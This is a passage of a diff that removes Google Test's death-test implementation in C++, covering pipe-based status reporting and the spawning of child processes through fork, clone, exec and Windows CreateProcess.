-    } \
-  } while (::testing::internal::AlwaysFalse())
-
-// Returns the message describing the last system error in errno.
-std::string GetLastErrnoDescription() {
-    return errno == 0 ? "" : posix::StrError(errno);
-}
-
-// This is called from a death test parent process to read a failure
-// message from the death test child process and log it with the FATAL
-// severity. On Windows, the message is read from a pipe handle. On other
-// platforms, it is read from a file descriptor.
-static void FailFromInternalError(int fd) {
-  Message error;
-  char buffer[256];
-  int num_read;
-
-  do {
-    while ((num_read = posix::Read(fd, buffer, 255)) > 0) {
-      buffer[num_read] = '\0';
-      error << buffer;
-    }
-  } while (num_read == -1 && errno == EINTR);
-
-  if (num_read == 0) {
-    GTEST_LOG_(FATAL) << error.GetString();
-  } else {
-    const int last_error = errno;
-    GTEST_LOG_(FATAL) << "Error while reading death test internal: "
-                      << GetLastErrnoDescription() << " [" << last_error << "]";
-  }
-}
-
-// Death test constructor.  Increments the running death test count
-// for the current test.
-DeathTest::DeathTest() {
-  TestInfo* const info = GetUnitTestImpl()->current_test_info();
-  if (info == NULL) {
-    DeathTestAbort("Cannot run a death test outside of a TEST or "
-                   "TEST_F construct");
-  }
-}
-
-// Creates and returns a death test by dispatching to the current
-// death test factory.
-bool DeathTest::Create(const char* statement, const RE* regex,
-                       const char* file, int line, DeathTest** test) {
-  return GetUnitTestImpl()->death_test_factory()->Create(
-      statement, regex, file, line, test);
-}
-
-const char* DeathTest::LastMessage() {
-  return last_death_test_message_.c_str();
-}
-
-void DeathTest::set_last_death_test_message(const std::string& message) {
-  last_death_test_message_ = message;
-}
-
-std::string DeathTest::last_death_test_message_;
-
-// Provides cross platform implementation for some death functionality.
-class DeathTestImpl : public DeathTest {
- protected:
-  DeathTestImpl(const char* a_statement, const RE* a_regex)
-      : statement_(a_statement),
-        regex_(a_regex),
-        spawned_(false),
-        status_(-1),
-        outcome_(IN_PROGRESS),
-        read_fd_(-1),
-        write_fd_(-1) {}
-
-  // read_fd_ is expected to be closed and cleared by a derived class.
-  ~DeathTestImpl() { GTEST_DEATH_TEST_CHECK_(read_fd_ == -1); }
-
-  void Abort(AbortReason reason);
-  virtual bool Passed(bool status_ok);
-
-  const char* statement() const { return statement_; }
-  const RE* regex() const { return regex_; }
-  bool spawned() const { return spawned_; }
-  void set_spawned(bool is_spawned) { spawned_ = is_spawned; }
-  int status() const { return status_; }
-  void set_status(int a_status) { status_ = a_status; }
-  DeathTestOutcome outcome() const { return outcome_; }
-  void set_outcome(DeathTestOutcome an_outcome) { outcome_ = an_outcome; }
-  int read_fd() const { return read_fd_; }
-  void set_read_fd(int fd) { read_fd_ = fd; }
-  int write_fd() const { return write_fd_; }
-  void set_write_fd(int fd) { write_fd_ = fd; }
-
-  // Called in the parent process only. Reads the result code of the death
-  // test child process via a pipe, interprets it to set the outcome_
-  // member, and closes read_fd_.  Outputs diagnostics and terminates in
-  // case of unexpected codes.
-  void ReadAndInterpretStatusByte();
-
- private:
-  // The textual content of the code this object is testing.  This class
-  // doesn't own this string and should not attempt to delete it.
-  const char* const statement_;
-  // The regular expression which test output must match.  DeathTestImpl
-  // doesn't own this object and should not attempt to delete it.
-  const RE* const regex_;
-  // True if the death test child process has been successfully spawned.
-  bool spawned_;
-  // The exit status of the child process.
-  int status_;
-  // How the death test concluded.
-  DeathTestOutcome outcome_;
-  // Descriptor to the read end of the pipe to the child process.  It is
-  // always -1 in the child process.  The child keeps its write end of the
-  // pipe in write_fd_.
-  int read_fd_;
-  // Descriptor to the child's write end of the pipe to the parent process.
-  // It is always -1 in the parent process.  The parent keeps its end of the
-  // pipe in read_fd_.
-  int write_fd_;
-};
-
-// Called in the parent process only. Reads the result code of the death
-// test child process via a pipe, interprets it to set the outcome_
-// member, and closes read_fd_.  Outputs diagnostics and terminates in
-// case of unexpected codes.
-void DeathTestImpl::ReadAndInterpretStatusByte() {
-  char flag;
-  int bytes_read;
-
-  // The read() here blocks until data is available (signifying the
-  // failure of the death test) or until the pipe is closed (signifying
-  // its success), so it's okay to call this in the parent before
-  // the child process has exited.
-  do {
-    bytes_read = posix::Read(read_fd(), &flag, 1);
-  } while (bytes_read == -1 && errno == EINTR);
-
-  if (bytes_read == 0) {
-    set_outcome(DIED);
-  } else if (bytes_read == 1) {
-    switch (flag) {
-      case kDeathTestReturned:
-        set_outcome(RETURNED);
-        break;
-      case kDeathTestThrew:
-        set_outcome(THREW);
-        break;
-      case kDeathTestLived:
-        set_outcome(LIVED);
-        break;
-      case kDeathTestInternalError:
-        FailFromInternalError(read_fd());  // Does not return.
-        break;
-      default:
-        GTEST_LOG_(FATAL) << "Death test child process reported "
-                          << "unexpected status byte ("
-                          << static_cast<unsigned int>(flag) << ")";
-    }
-  } else {
-    GTEST_LOG_(FATAL) << "Read from death test child process failed: "
-                      << GetLastErrnoDescription();
-  }
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(posix::Close(read_fd()));
-  set_read_fd(-1);
-}
-
-// Signals that the death test code which should have exited, didn't.
-// Should be called only in a death test child process.
-// Writes a status byte to the child's status file descriptor, then
-// calls _exit(1).
-void DeathTestImpl::Abort(AbortReason reason) {
-  // The parent process considers the death test to be a failure if
-  // it finds any data in our pipe.  So, here we write a single flag byte
-  // to the pipe, then exit.
-  const char status_ch =
-      reason == TEST_DID_NOT_DIE ? kDeathTestLived :
-      reason == TEST_THREW_EXCEPTION ? kDeathTestThrew : kDeathTestReturned;
-
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(posix::Write(write_fd(), &status_ch, 1));
-  // We are leaking the descriptor here because on some platforms (i.e.,
-  // when built as Windows DLL), destructors of global objects will still
-  // run after calling _exit(). On such systems, write_fd_ will be
-  // indirectly closed from the destructor of UnitTestImpl, causing double
-  // close if it is also closed here. On debug configurations, double close
-  // may assert. As there are no in-process buffers to flush here, we are
-  // relying on the OS to close the descriptor after the process terminates
-  // when the destructors are not run.
-  _exit(1);  // Exits w/o any normal exit hooks (we were supposed to crash)
-}
-
-// Returns an indented copy of stderr output for a death test.
-// This makes distinguishing death test output lines from regular log lines
-// much easier.
-static ::std::string FormatDeathTestOutput(const ::std::string& output) {
-  ::std::string ret;
-  for (size_t at = 0; ; ) {
-    const size_t line_end = output.find('\n', at);
-    ret += "[  DEATH   ] ";
-    if (line_end == ::std::string::npos) {
-      ret += output.substr(at);
-      break;
-    }
-    ret += output.substr(at, line_end + 1 - at);
-    at = line_end + 1;
-  }
-  return ret;
-}
-
-// Assesses the success or failure of a death test, using both private
-// members which have previously been set, and one argument:
-//
-// Private data members:
-//   outcome:  An enumeration describing how the death test
-//             concluded: DIED, LIVED, THREW, or RETURNED.  The death test
-//             fails in the latter three cases.
-//   status:   The exit status of the child process. On *nix, it is in the
-//             in the format specified by wait(2). On Windows, this is the
-//             value supplied to the ExitProcess() API or a numeric code
-//             of the exception that terminated the program.
-//   regex:    A regular expression object to be applied to
-//             the test's captured standard error output; the death test
-//             fails if it does not match.
-//
-// Argument:
-//   status_ok: true if exit_status is acceptable in the context of
-//              this particular death test, which fails if it is false
-//
-// Returns true iff all of the above conditions are met.  Otherwise, the
-// first failing condition, in the order given above, is the one that is
-// reported. Also sets the last death test message string.
-bool DeathTestImpl::Passed(bool status_ok) {
-  if (!spawned())
-    return false;
-
-  const std::string error_message = GetCapturedStderr();
-
-  bool success = false;
-  Message buffer;
-
-  buffer << "Death test: " << statement() << "\n";
-  switch (outcome()) {
-    case LIVED:
-      buffer << "    Result: failed to die.\n"
-             << " Error msg:\n" << FormatDeathTestOutput(error_message);
-      break;
-    case THREW:
-      buffer << "    Result: threw an exception.\n"
-             << " Error msg:\n" << FormatDeathTestOutput(error_message);
-      break;
-    case RETURNED:
-      buffer << "    Result: illegal return in test statement.\n"
-             << " Error msg:\n" << FormatDeathTestOutput(error_message);
-      break;
-    case DIED:
-      if (status_ok) {
-        const bool matched = RE::PartialMatch(error_message.c_str(), *regex());
-        if (matched) {
-          success = true;
-        } else {
-          buffer << "    Result: died but not with expected error.\n"
-                 << "  Expected: " << regex()->pattern() << "\n"
-                 << "Actual msg:\n" << FormatDeathTestOutput(error_message);
-        }
-      } else {
-        buffer << "    Result: died but not with expected exit code:\n"
-               << "            " << ExitSummary(status()) << "\n"
-               << "Actual msg:\n" << FormatDeathTestOutput(error_message);
-      }
-      break;
-    case IN_PROGRESS:
-    default:
-      GTEST_LOG_(FATAL)
-          << "DeathTest::Passed somehow called before conclusion of test";
-  }
-
-  DeathTest::set_last_death_test_message(buffer.GetString());
-  return success;
-}
-
-# if GTEST_OS_WINDOWS
-// WindowsDeathTest implements death tests on Windows. Due to the
-// specifics of starting new processes on Windows, death tests there are
-// always threadsafe, and Google Test considers the
-// --gtest_death_test_style=fast setting to be equivalent to
-// --gtest_death_test_style=threadsafe there.
-//
-// A few implementation notes:  Like the Linux version, the Windows
-// implementation uses pipes for child-to-parent communication. But due to
-// the specifics of pipes on Windows, some extra steps are required:
-//
-// 1. The parent creates a communication pipe and stores handles to both
-//    ends of it.
-// 2. The parent starts the child and provides it with the information
-//    necessary to acquire the handle to the write end of the pipe.
-// 3. The child acquires the write end of the pipe and signals the parent
-//    using a Windows event.
-// 4. Now the parent can release the write end of the pipe on its side. If
-//    this is done before step 3, the object's reference count goes down to
-//    0 and it is destroyed, preventing the child from acquiring it. The
-//    parent now has to release it, or read operations on the read end of
-//    the pipe will not return when the child terminates.
-// 5. The parent reads child's output through the pipe (outcome code and
-//    any possible error messages) from the pipe, and its stderr and then
-//    determines whether to fail the test.
-//
-// Note: to distinguish Win32 API calls from the local method and function
-// calls, the former are explicitly resolved in the global namespace.
-//
-class WindowsDeathTest : public DeathTestImpl {
- public:
-  WindowsDeathTest(const char* a_statement,
-                   const RE* a_regex,
-                   const char* file,
-                   int line)
-      : DeathTestImpl(a_statement, a_regex), file_(file), line_(line) {}
-
-  // All of these virtual functions are inherited from DeathTest.
-  virtual int Wait();
-  virtual TestRole AssumeRole();
-
- private:
-  // The name of the file in which the death test is located.
-  const char* const file_;
-  // The line number on which the death test is located.
-  const int line_;
-  // Handle to the write end of the pipe to the child process.
-  AutoHandle write_handle_;
-  // Child process handle.
-  AutoHandle child_handle_;
-  // Event the child process uses to signal the parent that it has
-  // acquired the handle to the write end of the pipe. After seeing this
-  // event the parent can release its own handles to make sure its
-  // ReadFile() calls return when the child terminates.
-  AutoHandle event_handle_;
-};
-
-// Waits for the child in a death test to exit, returning its exit
-// status, or 0 if no child process exists.  As a side effect, sets the
-// outcome data member.
-int WindowsDeathTest::Wait() {
-  if (!spawned())
-    return 0;
-
-  // Wait until the child either signals that it has acquired the write end
-  // of the pipe or it dies.
-  const HANDLE wait_handles[2] = { child_handle_.Get(), event_handle_.Get() };
-  switch (::WaitForMultipleObjects(2,
-                                   wait_handles,
-                                   FALSE,  // Waits for any of the handles.
-                                   INFINITE)) {
-    case WAIT_OBJECT_0:
-    case WAIT_OBJECT_0 + 1:
-      break;
-    default:
-      GTEST_DEATH_TEST_CHECK_(false);  // Should not get here.
-  }
-
-  // The child has acquired the write end of the pipe or exited.
-  // We release the handle on our side and continue.
-  write_handle_.Reset();
-  event_handle_.Reset();
-
-  ReadAndInterpretStatusByte();
-
-  // Waits for the child process to exit if it haven't already. This
-  // returns immediately if the child has already exited, regardless of
-  // whether previous calls to WaitForMultipleObjects synchronized on this
-  // handle or not.
-  GTEST_DEATH_TEST_CHECK_(
-      WAIT_OBJECT_0 == ::WaitForSingleObject(child_handle_.Get(),
-                                             INFINITE));
-  DWORD status_code;
-  GTEST_DEATH_TEST_CHECK_(
-      ::GetExitCodeProcess(child_handle_.Get(), &status_code) != FALSE);
-  child_handle_.Reset();
-  set_status(static_cast<int>(status_code));
-  return status();
-}
-
-// The AssumeRole process for a Windows death test.  It creates a child
-// process with the same executable as the current process to run the
-// death test.  The child process is given the --gtest_filter and
-// --gtest_internal_run_death_test flags such that it knows to run the
-// current death test only.
-DeathTest::TestRole WindowsDeathTest::AssumeRole() {
-  const UnitTestImpl* const impl = GetUnitTestImpl();
-  const InternalRunDeathTestFlag* const flag =
-      impl->internal_run_death_test_flag();
-  const TestInfo* const info = impl->current_test_info();
-  const int death_test_index = info->result()->death_test_count();
-
-  if (flag != NULL) {
-    // ParseInternalRunDeathTestFlag() has performed all the necessary
-    // processing.
-    set_write_fd(flag->write_fd());
-    return EXECUTE_TEST;
-  }
-
-  // WindowsDeathTest uses an anonymous pipe to communicate results of
-  // a death test.
-  SECURITY_ATTRIBUTES handles_are_inheritable = {
-    sizeof(SECURITY_ATTRIBUTES), NULL, TRUE };
-  HANDLE read_handle, write_handle;
-  GTEST_DEATH_TEST_CHECK_(
-      ::CreatePipe(&read_handle, &write_handle, &handles_are_inheritable,
-                   0)  // Default buffer size.
-      != FALSE);
-  set_read_fd(::_open_osfhandle(reinterpret_cast<intptr_t>(read_handle),
-                                O_RDONLY));
-  write_handle_.Reset(write_handle);
-  event_handle_.Reset(::CreateEvent(
-      &handles_are_inheritable,
-      TRUE,    // The event will automatically reset to non-signaled state.
-      FALSE,   // The initial state is non-signalled.
-      NULL));  // The even is unnamed.
-  GTEST_DEATH_TEST_CHECK_(event_handle_.Get() != NULL);
-  const std::string filter_flag =
-      std::string("--") + GTEST_FLAG_PREFIX_ + kFilterFlag + "=" +
-      info->test_case_name() + "." + info->name();
-  const std::string internal_flag =
-      std::string("--") + GTEST_FLAG_PREFIX_ + kInternalRunDeathTestFlag +
-      "=" + file_ + "|" + StreamableToString(line_) + "|" +
-      StreamableToString(death_test_index) + "|" +
-      StreamableToString(static_cast<unsigned int>(::GetCurrentProcessId())) +
-      // size_t has the same width as pointers on both 32-bit and 64-bit
-      // Windows platforms.
-      // See http://msdn.microsoft.com/en-us/library/tcxf1dw6.aspx.
-      "|" + StreamableToString(reinterpret_cast<size_t>(write_handle)) +
-      "|" + StreamableToString(reinterpret_cast<size_t>(event_handle_.Get()));
-
-  char executable_path[_MAX_PATH + 1];  // NOLINT
-  GTEST_DEATH_TEST_CHECK_(
-      _MAX_PATH + 1 != ::GetModuleFileNameA(NULL,
-                                            executable_path,
-                                            _MAX_PATH));
-
-  std::string command_line =
-      std::string(::GetCommandLineA()) + " " + filter_flag + " \"" +
-      internal_flag + "\"";
-
-  DeathTest::set_last_death_test_message("");
-
-  CaptureStderr();
-  // Flush the log buffers since the log streams are shared with the child.
-  FlushInfoLog();
-
-  // The child process will share the standard handles with the parent.
-  STARTUPINFOA startup_info;
-  memset(&startup_info, 0, sizeof(STARTUPINFO));
-  startup_info.dwFlags = STARTF_USESTDHANDLES;
-  startup_info.hStdInput = ::GetStdHandle(STD_INPUT_HANDLE);
-  startup_info.hStdOutput = ::GetStdHandle(STD_OUTPUT_HANDLE);
-  startup_info.hStdError = ::GetStdHandle(STD_ERROR_HANDLE);
-
-  PROCESS_INFORMATION process_info;
-  GTEST_DEATH_TEST_CHECK_(::CreateProcessA(
-      executable_path,
-      const_cast<char*>(command_line.c_str()),
-      NULL,   // Retuned process handle is not inheritable.
-      NULL,   // Retuned thread handle is not inheritable.
-      TRUE,   // Child inherits all inheritable handles (for write_handle_).
-      0x0,    // Default creation flags.
-      NULL,   // Inherit the parent's environment.
-      UnitTest::GetInstance()->original_working_dir(),
-      &startup_info,
-      &process_info) != FALSE);
-  child_handle_.Reset(process_info.hProcess);
-  ::CloseHandle(process_info.hThread);
-  set_spawned(true);
-  return OVERSEE_TEST;
-}
-# else  // We are not on Windows.
-
-// ForkingDeathTest provides implementations for most of the abstract
-// methods of the DeathTest interface.  Only the AssumeRole method is
-// left undefined.
-class ForkingDeathTest : public DeathTestImpl {
- public:
-  ForkingDeathTest(const char* statement, const RE* regex);
-
-  // All of these virtual functions are inherited from DeathTest.
-  virtual int Wait();
-
- protected:
-  void set_child_pid(pid_t child_pid) { child_pid_ = child_pid; }
-
- private:
-  // PID of child process during death test; 0 in the child process itself.
-  pid_t child_pid_;
-};
-
-// Constructs a ForkingDeathTest.
-ForkingDeathTest::ForkingDeathTest(const char* a_statement, const RE* a_regex)
-    : DeathTestImpl(a_statement, a_regex),
-      child_pid_(-1) {}
-
-// Waits for the child in a death test to exit, returning its exit
-// status, or 0 if no child process exists.  As a side effect, sets the
-// outcome data member.
-int ForkingDeathTest::Wait() {
-  if (!spawned())
-    return 0;
-
-  ReadAndInterpretStatusByte();
-
-  int status_value;
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(waitpid(child_pid_, &status_value, 0));
-  set_status(status_value);
-  return status_value;
-}
-
-// A concrete death test class that forks, then immediately runs the test
-// in the child process.
-class NoExecDeathTest : public ForkingDeathTest {
- public:
-  NoExecDeathTest(const char* a_statement, const RE* a_regex) :
-      ForkingDeathTest(a_statement, a_regex) { }
-  virtual TestRole AssumeRole();
-};
-
-// The AssumeRole process for a fork-and-run death test.  It implements a
-// straightforward fork, with a simple pipe to transmit the status byte.
-DeathTest::TestRole NoExecDeathTest::AssumeRole() {
-  const size_t thread_count = GetThreadCount();
-  if (thread_count != 1) {
-    GTEST_LOG_(WARNING) << DeathTestThreadWarning(thread_count);
-  }
-
-  int pipe_fd[2];
-  GTEST_DEATH_TEST_CHECK_(pipe(pipe_fd) != -1);
-
-  DeathTest::set_last_death_test_message("");
-  CaptureStderr();
-  // When we fork the process below, the log file buffers are copied, but the
-  // file descriptors are shared.  We flush all log files here so that closing
-  // the file descriptors in the child process doesn't throw off the
-  // synchronization between descriptors and buffers in the parent process.
-  // This is as close to the fork as possible to avoid a race condition in case
-  // there are multiple threads running before the death test, and another
-  // thread writes to the log file.
-  FlushInfoLog();
-
-  const pid_t child_pid = fork();
-  GTEST_DEATH_TEST_CHECK_(child_pid != -1);
-  set_child_pid(child_pid);
-  if (child_pid == 0) {
-    GTEST_DEATH_TEST_CHECK_SYSCALL_(close(pipe_fd[0]));
-    set_write_fd(pipe_fd[1]);
-    // Redirects all logging to stderr in the child process to prevent
-    // concurrent writes to the log files.  We capture stderr in the parent
-    // process and append the child process' output to a log.
-    LogToStderr();
-    // Event forwarding to the listeners of event listener API mush be shut
-    // down in death test subprocesses.
-    GetUnitTestImpl()->listeners()->SuppressEventForwarding();
-    g_in_fast_death_test_child = true;
-    return EXECUTE_TEST;
-  } else {
-    GTEST_DEATH_TEST_CHECK_SYSCALL_(close(pipe_fd[1]));
-    set_read_fd(pipe_fd[0]);
-    set_spawned(true);
-    return OVERSEE_TEST;
-  }
-}
-
-// A concrete death test class that forks and re-executes the main
-// program from the beginning, with command-line flags set that cause
-// only this specific death test to be run.
-class ExecDeathTest : public ForkingDeathTest {
- public:
-  ExecDeathTest(const char* a_statement, const RE* a_regex,
-                const char* file, int line) :
-      ForkingDeathTest(a_statement, a_regex), file_(file), line_(line) { }
-  virtual TestRole AssumeRole();
- private:
-  static ::std::vector<testing::internal::string>
-  GetArgvsForDeathTestChildProcess() {
-    ::std::vector<testing::internal::string> args = GetInjectableArgvs();
-    return args;
-  }
-  // The name of the file in which the death test is located.
-  const char* const file_;
-  // The line number on which the death test is located.
-  const int line_;
-};
-
-// Utility class for accumulating command-line arguments.
-class Arguments {
- public:
-  Arguments() {
-    args_.push_back(NULL);
-  }
-
-  ~Arguments() {
-    for (std::vector<char*>::iterator i = args_.begin(); i != args_.end();
-         ++i) {
-      free(*i);
-    }
-  }
-  void AddArgument(const char* argument) {
-    args_.insert(args_.end() - 1, posix::StrDup(argument));
-  }
-
-  template <typename Str>
-  void AddArguments(const ::std::vector<Str>& arguments) {
-    for (typename ::std::vector<Str>::const_iterator i = arguments.begin();
-         i != arguments.end();
-         ++i) {
-      args_.insert(args_.end() - 1, posix::StrDup(i->c_str()));
-    }
-  }
-  char* const* Argv() {
-    return &args_[0];
-  }
-
- private:
-  std::vector<char*> args_;
-};
-
-// A struct that encompasses the arguments to the child process of a
-// threadsafe-style death test process.
-struct ExecDeathTestArgs {
-  char* const* argv;  // Command-line arguments for the child's call to exec
-  int close_fd;       // File descriptor to close; the read end of a pipe
-};
-
-#  if GTEST_OS_MAC
-inline char** GetEnviron() {
-  // When Google Test is built as a framework on MacOS X, the environ variable
-  // is unavailable. Apple's documentation (man environ) recommends using
-  // _NSGetEnviron() instead.
-  return *_NSGetEnviron();
-}
-#  else
-// Some POSIX platforms expect you to declare environ. extern "C" makes
-// it reside in the global namespace.
-extern "C" char** environ;
-inline char** GetEnviron() { return environ; }
-#  endif  // GTEST_OS_MAC
-
-#  if !GTEST_OS_QNX
-// The main function for a threadsafe-style death test child process.
-// This function is called in a clone()-ed process and thus must avoid
-// any potentially unsafe operations like malloc or libc functions.
-static int ExecDeathTestChildMain(void* child_arg) {
-  ExecDeathTestArgs* const args = static_cast<ExecDeathTestArgs*>(child_arg);
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(close(args->close_fd));
-
-  // We need to execute the test program in the same environment where
-  // it was originally invoked.  Therefore we change to the original
-  // working directory first.
-  const char* const original_dir =
-      UnitTest::GetInstance()->original_working_dir();
-  // We can safely call chdir() as it's a direct system call.
-  if (chdir(original_dir) != 0) {
-    DeathTestAbort(std::string("chdir(\"") + original_dir + "\") failed: " +
-                   GetLastErrnoDescription());
-    return EXIT_FAILURE;
-  }
-
-  // We can safely call execve() as it's a direct system call.  We
-  // cannot use execvp() as it's a libc function and thus potentially
-  // unsafe.  Since execve() doesn't search the PATH, the user must
-  // invoke the test program via a valid path that contains at least
-  // one path separator.
-  execve(args->argv[0], args->argv, GetEnviron());
-  DeathTestAbort(std::string("execve(") + args->argv[0] + ", ...) in " +
-                 original_dir + " failed: " +
-                 GetLastErrnoDescription());
-  return EXIT_FAILURE;
-}
-#  endif  // !GTEST_OS_QNX
-
-// Two utility routines that together determine the direction the stack
-// grows.
-// This could be accomplished more elegantly by a single recursive
-// function, but we want to guard against the unlikely possibility of
-// a smart compiler optimizing the recursion away.
-//
-// GTEST_NO_INLINE_ is required to prevent GCC 4.6 from inlining
-// StackLowerThanAddress into StackGrowsDown, which then doesn't give
-// correct answer.
-void StackLowerThanAddress(const void* ptr, bool* result) GTEST_NO_INLINE_;
-void StackLowerThanAddress(const void* ptr, bool* result) {
-  int dummy;
-  *result = (&dummy < ptr);
-}
-
-// Make sure AddressSanitizer does not tamper with the stack here.
-GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-bool StackGrowsDown() {
-  int dummy;
-  bool result;
-  StackLowerThanAddress(&dummy, &result);
-  return result;
-}
-
-// Spawns a child process with the same executable as the current process in
-// a thread-safe manner and instructs it to run the death test.  The
-// implementation uses fork(2) + exec.  On systems where clone(2) is
-// available, it is used instead, being slightly more thread-safe.  On QNX,
-// fork supports only single-threaded environments, so this function uses
-// spawn(2) there instead.  The function dies with an error message if
-// anything goes wrong.
-static pid_t ExecDeathTestSpawnChild(char* const* argv, int close_fd) {
-  ExecDeathTestArgs args = { argv, close_fd };
-  pid_t child_pid = -1;
-
-#  if GTEST_OS_QNX
-  // Obtains the current directory and sets it to be closed in the child
-  // process.
-  const int cwd_fd = open(".", O_RDONLY);
-  GTEST_DEATH_TEST_CHECK_(cwd_fd != -1);
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(fcntl(cwd_fd, F_SETFD, FD_CLOEXEC));
-  // We need to execute the test program in the same environment where
-  // it was originally invoked.  Therefore we change to the original
-  // working directory first.
-  const char* const original_dir =
-      UnitTest::GetInstance()->original_working_dir();
-  // We can safely call chdir() as it's a direct system call.
-  if (chdir(original_dir) != 0) {
-    DeathTestAbort(std::string("chdir(\"") + original_dir + "\") failed: " +
-                   GetLastErrnoDescription());
-    return EXIT_FAILURE;
-  }
-
-  int fd_flags;
-  // Set close_fd to be closed after spawn.
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(fd_flags = fcntl(close_fd, F_GETFD));
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(fcntl(close_fd, F_SETFD,
-                                        fd_flags | FD_CLOEXEC));
-  struct inheritance inherit = {0};
-  // spawn is a system call.
-  child_pid = spawn(args.argv[0], 0, NULL, &inherit, args.argv, GetEnviron());
-  // Restores the current working directory.
-  GTEST_DEATH_TEST_CHECK_(fchdir(cwd_fd) != -1);
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(close(cwd_fd));
-
-#  else   // GTEST_OS_QNX
-#   if GTEST_OS_LINUX
-  // When a SIGPROF signal is received while fork() or clone() are executing,
-  // the process may hang. To avoid this, we ignore SIGPROF here and re-enable
-  // it after the call to fork()/clone() is complete.
-  struct sigaction saved_sigprof_action;
-  struct sigaction ignore_sigprof_action;
-  memset(&ignore_sigprof_action, 0, sizeof(ignore_sigprof_action));
-  sigemptyset(&ignore_sigprof_action.sa_mask);
-  ignore_sigprof_action.sa_handler = SIG_IGN;
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(sigaction(
-      SIGPROF, &ignore_sigprof_action, &saved_sigprof_action));
-#   endif  // GTEST_OS_LINUX
-
-#   if GTEST_HAS_CLONE
-  const bool use_fork = GTEST_FLAG(death_test_use_fork);
-
-  if (!use_fork) {
-    static const bool stack_grows_down = StackGrowsDown();
-    const size_t stack_size = getpagesize();
-    // MMAP_ANONYMOUS is not defined on Mac, so we use MAP_ANON instead.
-    void* const stack = mmap(NULL, stack_size, PROT_READ | PROT_WRITE,
-                             MAP_ANON | MAP_PRIVATE, -1, 0);
-    GTEST_DEATH_TEST_CHECK_(stack != MAP_FAILED);
-
-    // Maximum stack alignment in bytes:  For a downward-growing stack, this
-    // amount is subtracted from size of the stack space to get an address
-    // that is within the stack space and is aligned on all systems we care
-    // about.  As far as I know there is no ABI with stack alignment greater
-    // than 64.  We assume stack and stack_size already have alignment of
-    // kMaxStackAlignment.
-    const size_t kMaxStackAlignment = 64;
-    void* const stack_top =
-        static_cast<char*>(stack) +
-            (stack_grows_down ? stack_size - kMaxStackAlignment : 0);
-    GTEST_DEATH_TEST_CHECK_(stack_size > kMaxStackAlignment &&
-        reinterpret_cast<intptr_t>(stack_top) % kMaxStackAlignment == 0);
-
-    child_pid = clone(&ExecDeathTestChildMain, stack_top, SIGCHLD, &args);
-
-    GTEST_DEATH_TEST_CHECK_(munmap(stack, stack_size) != -1);
-  }
-#   else
-  const bool use_fork = true;
-#   endif  // GTEST_HAS_CLONE
-
-  if (use_fork && (child_pid = fork()) == 0) {
-      ExecDeathTestChildMain(&args);
-      _exit(0);
-  }
-#  endif  // GTEST_OS_QNX
-#  if GTEST_OS_LINUX
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(
-      sigaction(SIGPROF, &saved_sigprof_action, NULL));
-#  endif  // GTEST_OS_LINUX
-
-  GTEST_DEATH_TEST_CHECK_(child_pid != -1);
-  return child_pid;
-}
-
-// The AssumeRole process for a fork-and-exec death test.  It re-executes the
-// main program from the beginning, setting the --gtest_filter
-// and --gtest_internal_run_death_test flags to cause only the current
-// death test to be re-run.
-DeathTest::TestRole ExecDeathTest::AssumeRole() {
-  const UnitTestImpl* const impl = GetUnitTestImpl();
-  const InternalRunDeathTestFlag* const flag =
-      impl->internal_run_death_test_flag();
-  const TestInfo* const info = impl->current_test_info();
-  const int death_test_index = info->result()->death_test_count();
-
-  if (flag != NULL) {
-    set_write_fd(flag->write_fd());
-    return EXECUTE_TEST;
-  }
-
-  int pipe_fd[2];
-  GTEST_DEATH_TEST_CHECK_(pipe(pipe_fd) != -1);
-  // Clear the close-on-exec flag on the write end of the pipe, lest
-  // it be closed when the child process does an exec:
-  GTEST_DEATH_TEST_CHECK_(fcntl(pipe_fd[1], F_SETFD, 0) != -1);
-
-  const std::string filter_flag =
-      std::string("--") + GTEST_FLAG_PREFIX_ + kFilterFlag + "="
-      + info->test_case_name() + "." + info->name();
-  const std::string internal_flag =
-      std::string("--") + GTEST_FLAG_PREFIX_ + kInternalRunDeathTestFlag + "="
-      + file_ + "|" + StreamableToString(line_) + "|"
-      + StreamableToString(death_test_index) + "|"
-      + StreamableToString(pipe_fd[1]);
-  Arguments args;
-  args.AddArguments(GetArgvsForDeathTestChildProcess());
-  args.AddArgument(filter_flag.c_str());
-  args.AddArgument(internal_flag.c_str());
-
-  DeathTest::set_last_death_test_message("");
-
-  CaptureStderr();
-  // See the comment in NoExecDeathTest::AssumeRole for why the next line
-  // is necessary.
-  FlushInfoLog();
-
-  const pid_t child_pid = ExecDeathTestSpawnChild(args.Argv(), pipe_fd[0]);
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(close(pipe_fd[1]));
-  set_child_pid(child_pid);
-  set_read_fd(pipe_fd[0]);
-  set_spawned(true);
-  return OVERSEE_TEST;
-}
-
-# endif  // !GTEST_OS_WINDOWS
-
-// Creates a concrete DeathTest-derived class that depends on the
-// --gtest_death_test_style flag, and sets the pointer pointed to
-// by the "test" argument to its address.  If the test should be
-// skipped, sets that pointer to NULL.  Returns true, unless the
-// flag is set to an invalid value.
-bool DefaultDeathTestFactory::Create(const char* statement, const RE* regex,
-                                     const char* file, int line,
-                                     DeathTest** test) {
-  UnitTestImpl* const impl = GetUnitTestImpl();
-  const InternalRunDeathTestFlag* const flag =
-      impl->internal_run_death_test_flag();
-  const int death_test_index = impl->current_test_info()
-      ->increment_death_test_count();
-
-  if (flag != NULL) {
-    if (death_test_index > flag->index()) {
-      DeathTest::set_last_death_test_message(
-          "Death test count (" + StreamableToString(death_test_index)
-          + ") somehow exceeded expected maximum ("
-          + StreamableToString(flag->index()) + ")");
-      return false;
-    }
-
-    if (!(flag->file() == file && flag->line() == line &&
-          flag->index() == death_test_index)) {
-      *test = NULL;
-      return true;
-    }
-  }
-
-# if GTEST_OS_WINDOWS
-
-  if (GTEST_FLAG(death_test_style) == "threadsafe" ||
-      GTEST_FLAG(death_test_style) == "fast") {
-    *test = new WindowsDeathTest(statement, regex, file, line);
-  }
-
-# else
-
-  if (GTEST_FLAG(death_test_style) == "threadsafe") {
